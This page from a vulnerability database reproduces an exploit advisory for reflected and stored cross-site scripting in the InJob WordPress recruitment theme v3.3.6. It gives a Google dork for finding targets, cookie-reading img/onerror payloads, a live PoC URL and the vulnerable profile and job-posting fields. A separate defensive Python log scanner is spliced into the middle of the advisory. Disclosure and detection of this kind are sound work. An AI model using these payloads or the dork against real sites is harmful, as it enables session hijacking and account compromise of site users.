InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS - CXSecurity.com

Vulnerability ID 1742287 Vulnerability type
Published 2019-09-16 Updated 2019-09-16
CVE number N/A CNNVD-ID N/A
Vulnerability platform N/A CVSS score N/A
|Vulnerability source
https://cxsecurity.com/issue/WLB-2019090115
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
# Exploit Title: InJob | Multi-purpose for recruitment WordPress Theme v3.3.6 Reflected & Persistent XSS
# Google Dork: inurl:/wp-content/themes/injob/
# Date: 15/09/2019
# Exploit Author: SubversA
# Vendor Homepage: http://www.inwavethemes.com/
# Software Link: https://themeforest.net/item/injob-job-board-wordpress-theme/20322987
# Version: 3.3.6
# Tested on: Parrot OS
# CVE : -
# CWE : 79


----[]- Reflected XSS: -[]----
Use your payload inside the «Enter Keywords» input field and then submit the form; the payload will be triggered twice.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC Link: http://jobboard.inwavethemes.com/jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location=&iwj_cat=&iwj_type=&iwj_skill=&iwj_level=&iwj_salary=
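As an added defender-side example (not part of the advisory), the script below parses access-log lines in Combined Log Format, percent-decodes every query parameter and flags values that carry markup such as a tag opening, an HTML comment delimiter or an on* event handler. The log lines are constructed; the first one carries the reflected-XSS PoC query string from this advisory, the others are benign.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Constructed sample log lines (Combined Log Format); the first request carries
# the advisory's PoC query string, the other two are ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Sep/2019:10:00:01 +0000] "GET /jobs/?keyword=%3C%21--%3Cimg+src%3D%22--%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28document.cookie%29%2F%2F%22%3E&iwj_location=&iwj_cat= HTTP/1.1" 200 5120
203.0.113.9 - - [16/Sep/2019:10:00:07 +0000] "GET /jobs/?keyword=python+developer&iwj_location=london HTTP/1.1" 200 4096
198.51.100.2 - - [16/Sep/2019:10:01:13 +0000] "POST /dashboard/?iwj_tab=new-job HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markup that has no business inside a free-text search keyword: a tag or
# comment opening ("<img", "<!--") or an on* event-handler attribute.
SUSPICIOUS_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon[a-z]+\s*=', re.IGNORECASE)


def suspicious_params(target: str) -> dict:
    """Return {param: decoded value} for query parameters that look like markup injection."""
    hits = {}
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl already percent-decodes once; decode again so a
        # double-encoded payload is inspected in its final form as well.
        decoded = unquote_plus(value)
        if SUSPICIOUS_RE.search(decoded):
            hits[name] = decoded
    return hits


def scan_log(text: str) -> list:
    """Scan access-log text; return one finding per request with suspicious parameters."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        hits = suspicious_params(m["target"])
        if hits:
            findings.append({"ip": m["ip"], "path": urlsplit(m["target"]).path, "params": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"{finding['ip']} {finding['path']} -> {finding['params']}")
```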


----[]- Persistent XSS #1: -[]----
You need a new basic user account, then go to the dashboard and edit your profile. Vulnerable input fields:
- «Phone» & «Headline *»;
- «Title» input field in the «Skills» section;
- «Title», «Description», «Date In - Date Out» & «Company Name» in the «Experiences» section;
- «Title», «Description» & «School Name» in the «Educations» section;
- «Address *» input field in the «Location & Map» section.
Use your payload inside any vulnerable input field and save your profile.

Payload Sample: <!--<img src="--><img src=x onerror=(alert)(document.cookie)//">

PoC: log in as candidate:demo (login/password) and go to the dashboard, or, as a guest, open the http://jobboard.inwavethemes.com/employers?alpha=i page.


----[]- Persistent XSS #2: -[]----
You need an employer user account, then go to the http://jobboard.inwavethemes.com/dashboard/?iwj_tab=new-job page to create a new job offer. Vulnerable input fields: «Salary Postfix Text» and «Address *».

Payload Sample: <img src=x onerror=(alert)(document.domain)//">